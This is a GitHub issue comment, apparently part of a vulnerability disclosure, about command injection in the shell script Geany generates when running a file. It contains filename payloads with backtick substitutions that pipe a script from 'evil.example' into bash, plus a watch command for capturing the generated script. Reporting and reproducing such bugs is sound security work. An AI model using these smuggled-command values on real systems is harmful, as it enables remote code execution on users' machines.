WrapEarnPass left a comment (geany/geany#4611) My expanded shellscript from geany-2.1 (via debian/testing) does not contain the same value as the exemplar. Exemplar ``` ./test`curl http://evil.example/payload.sh|bash` ``` Capture the shellscript: ```watch -n 0.01 -g 'cat /tmp/geany*.sh 2>&1 >> /tmp/watch.sh'``` Local test: ```"./test`curl evil.example|bash`" ```
This however, does still attempt the backtick, as evidenced by the shellscript output: <img width="811" height="229" alt="Image" src="https://github.com/user-attachments/assets/2bbca231-a3a8-4d9b-a245-d3c35677380d" /> Impact confirmed with modified initial condition. -- Reply to this email directly or view it on GitHub: https://github.com/geany/geany/issues/4611#issuecomment-4845081744 You are receiving this because you are subscribed to this thread. Message ID: <geany/geany/issues/4611/[email protected]>
